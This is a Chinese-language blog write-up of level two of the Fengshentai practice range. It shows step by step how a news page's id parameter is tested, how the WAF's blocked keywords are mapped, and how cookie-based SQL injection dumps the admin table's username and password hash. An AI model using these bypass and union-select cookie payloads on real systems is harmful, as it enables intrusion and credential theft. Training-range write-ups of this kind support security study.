首页 > 其他分享 >封神台靶场第二关

封神台靶场第二关

时间:2023-11-21 20:55:05浏览次数:36  
标签:cookies 神台 第二 admin select 靶场 id 171 页面

点击传送门

来到目标公司网站

 可以看到有很多的网页

现在我们需要寻找注入点,注入点存在的页面一般可以明显的显示出正确页面和错误页面

这里可以看到有新闻页面

有新闻的一般选择新闻页面

我们点击第一个新闻

 进来后可以看到

 URL为

http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171

开始试探

(1)判断waf拦截的关键字
'触发waf
and触发waf
or触发waf
select触发waf
union order by不会触发waf
--+不能被数据库识别,要使用#
(2)联合查询注入尝试
得到注入点数量,构建联合查询语句
?id=171 union select 1,2,3,4,5,6,7,8,9,10#
利用SQL绕过手法使得select可用
试图转码绕过失败
试图利用/**/和/*!*/绕过失败
放弃联合查询
(3)cookies绕过尝试
尝试cookies绕过
直接访问http://g8wepfcp.ia.aqlab.cn/shownews.asp
利用bp抓包,将原cookies值
Cookie: ASPSESSIONIDACQTQQAS=OKOJFAODPDJCCFEKBAECGJDK
改为
Cookie: id=171

 

访问网页,发现访问的页面正常输出,cookies可以当值来用
将值改为联合查询语句
并猜测表admin的存在性
Cookie: id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

页面返回正常,说明admin表存在
且页面返回的字段有2,3,7,8,9
这时可以将注入点2,3,7,8,9替换为字段名,用这种方式来猜测字段的存在,并体现返回值
Cookie: id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
页面返回

username:admin
password:b9a2a2b5dffb918c
利用bp解码后

password为welcome

标签:cookies,神台,第二,admin,select,靶场,id,171,页面
From: https://www.cnblogs.com/baimuyangren/p/17847572.html

相关文章

  • 第二篇Scrum冲刺博客
    作业概述这个作业属于哪个课程软件工程这个作业要求在哪里团队作业4——项目冲刺这个作业的目标每天举行站立式会议,项目燃尽图,代码/文档签入记录,项目程序/模块的最新(运行)截图,每日每人总结站立式会议1.会议照片项目进展昨天完成的工作数据库表设计已经初步......
  • python连接数据库到excel 第二回
    #使用前建议看一下sqllalchemy和create_engine,主要就是数据库拉数据导入excel#下面是代码部分fromsqlalchemyimportcreate_engine,text#利用sqlalchemy顺带用create_engine,text区分大小写importpandasaspd#表host='cs-'user='root'password='6Ep'db='perf......
  • python学习第二天笔记(未完成)
    #python(11.20--11.21)数数从0开始,左闭右开,不输默认。注意行对齐##注释:#单行注释“”“多行注释”“”##类型intstr(字符串,单个字符使长度为1的字符串)float(默认双精度)list注释:同一段代码对当变量类型不同时会产生不同的效果:譬如print(a+b)当a="1"b="2"......
  • 驾驶舱首页说明图片第二版
    用户增长: BI:经营:交付: ......
  • 敏捷冲刺——第二天
    团队作业4——项目冲刺这个作业属于哪个课程计科21级12班这个作业要求在哪里团队作业4——项目冲刺这个作业的目标进行敏捷冲刺开发团队队名:KAODAPU团队组成张建文(组长)3121004845叶飞池3121004843林智谦3121004831刘晋延3121004832......
  • 【靶场部署】文件上传靶场搭建
    upload-labs漏洞靶场搭建步骤1、下载:可以在GitHub上下载相关源码。下载网址为https://github.com/c0ny1/upload-labs,点击此处下载压缩包。2、下载完成后将解压后的目录文件sqli-labs-master复制到 D:\phpStudy\WWW下3、在虚拟机中,打开phpstudy,并启动。 4、在虚拟机中,打开......
  • 2023-2024-1 20232407 《网络》 第二周学习总结
    教材学习内容总结教材学习中的问题和解决过程问题1:密码学基础中的对称加密和非对称加密有什么区别?它们分别适用于什么场景?解决方案:询问GPT问题2:什么是数字签名?它是如何保证消息的完整性和真实性的?解决方案:询问GPT基于AI的学习思考在密码学基础中,对称加密和非对称加密是......
  • 网络空间安全导论第二章
    学期(2023-2024-1)学号(20232418)《网络》第2周学习总结教材学习内容总结思维导图工具推荐:xmindprocessonwps教材学习中的问题和解决过程问题1:什么是混合密码系统?问题1解决方案:混合密码系统是一种将对称密码和公钥密码结合起来使用的密码系统。它的基本思想是利用对称......
  • 线性代数导论MIT第二章知识点下
    2.3--2.7的知识点1.使用矩阵消元 2.消元矩阵 3.行交换矩阵 4.增广矩阵2.4矩阵运算规则 行与列方块矩阵与方块乘法舒尔补充2.5逆矩阵乘积AB的逆矩阵......
  • 第二章 ObjectScript 语法的基本规则
    大小写规则ObjectScript的某些部分区分大小写,而其他部分则不区分大小写。一般来说,ObjectScript的用户可定义部分区分大小写,而关键字则不区分大小写:区分大小写:变量名(局部、全局和进程私有全局)和变量下标、类名、方法名、属性名、属性的实例变量的i%前言、例程名称、宏名......